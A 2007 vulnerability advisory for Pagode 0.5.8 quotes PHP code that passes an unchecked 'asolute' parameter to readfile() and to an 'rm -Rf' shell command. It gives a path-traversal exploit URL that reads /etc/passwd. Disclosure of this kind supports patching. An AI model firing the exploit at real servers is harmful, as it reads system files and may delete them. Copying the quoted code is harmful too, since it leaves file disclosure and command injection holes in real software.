Security Advisory: Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability
  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability
  GPB bulletin board Remote file include

From: GolD_M <hacker__(at)_w.cn>
Date: 30.04.2007
Subject: Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure

# Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
# D.Script:http
://belnet.dl.sourceforge.net/sourceforge/pagode/pagode-0.5.8.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /navigator/navigator_ok.php:
###################/navigator/navigator_ok.php###################
# <?
# session_cache_limiter('none');
# session_start();
# include ('../includes/functions.php');
#
# header("Content-Type: application/save-as");
# header("Content-Length: $file_size");
# header("Content-Disposition: attachment; filename=$file_name");
# header("Content-Transfer-Encoding: binary");
# readfile($asolute); <----[+]
# exec("rm -Rf $asolute");
# ?>
#################################################################
# Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../..
/etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020

test server